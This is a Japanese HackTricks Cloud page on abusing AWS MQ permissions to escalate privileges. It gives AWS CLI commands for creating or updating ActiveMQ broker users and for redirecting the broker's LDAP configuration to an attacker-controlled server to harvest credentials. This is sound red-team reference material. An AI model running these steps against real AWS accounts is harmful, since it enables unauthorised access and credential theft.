AWS - MQ Privesc
Tip
学んで実践する AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks をサポートする
- subscription plans を確認してください!
- 参加する 💬 Discord group または telegram group に参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
MQ
MQの詳細については以下を参照してください:
mq:ListBrokers, mq:CreateUser
これらの権限があれば、ActimeMQ ブローカーに新しいユーザーを作成できます(これは RabbitMQ では動作しません):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
Potential Impact: ActiveMQ を操作して機密情報にアクセスする
mq:ListBrokers, mq:ListUsers, mq:UpdateUser
これらの権限があれば、ActimeMQ broker に新しいユーザーを作成できます(これは RabbitMQ では動作しません):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
Potential Impact: ActiveMQ を通じて機密情報へアクセス可能
mq:ListBrokers, mq:UpdateBroker
ブローカーが ActiveMQ での認可に LDAP を使用している場合、使用されているLDAPサーバーの設定を攻撃者の管理下にあるものに変更することが可能です。こうすることで、攻撃者は LDAP を通じて送信されるすべての認証情報を窃取できるようになります。
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
もし何らかの方法で ActiveMQ に使われた元の credentials を見つけられれば、MitM を実行して creds を盗み、それらを元のサーバーで使用してレスポンスを送信できます(盗んだ creds を再利用するだけで可能かもしれません)。
潜在的な影響: ActiveMQ の credentials を盗む
Tip
学んで実践する AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks をサポートする
- subscription plans を確認してください!
- 参加する 💬 Discord group または telegram group に参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
HackTricks Cloud

